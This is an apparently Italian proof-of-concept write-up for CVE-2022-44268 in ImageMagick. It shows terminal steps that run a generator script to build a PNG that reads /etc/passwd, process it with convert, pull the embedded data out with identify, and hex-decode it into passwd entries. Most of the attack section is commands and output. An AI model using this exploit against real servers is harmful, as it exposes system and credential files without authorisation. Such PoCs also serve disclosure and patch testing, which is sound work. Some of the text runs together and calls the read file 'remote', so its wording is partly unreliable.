
ImageMagick LFI PoC [CVE-2022-44268]
I ricercatori di MetabaseQ hanno scoperto la CVE-2022-44268, ovvero che ImageMagick 7.1.0-49 è vulnerabile alla divulgazione di informazioni. Quando analizza un'immagine PNG (ad es., per il ridimensionamento), l'immagine risultante potrebbe aver incorporato il contenuto di un file remoto arbitrario (se il binario di ImageMagick ha i permessi per leggerlo).
(~)>>> python3 generate.py -f "/etc/passwd" -o exploit.png
[>] ImageMagick LFI PoC - by Sybil Scan Research <[email protected]>
[>] Generating Blank PNG
[>] Blank PNG generated
[>] Placing Payload to read /etc/passwd
[>] PoC PNG generated > exploit.png
(~)>>> convert exploit.png result.png
(~)>>> identify -verbose result.png
Raw profile type e osserverai il contenuto di :/etc/passwd(~)>>> python3 -c 'print(bytes.fromhex("726f6f743a783a726f6f743---REDACTED--").decode("utf-8"))'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin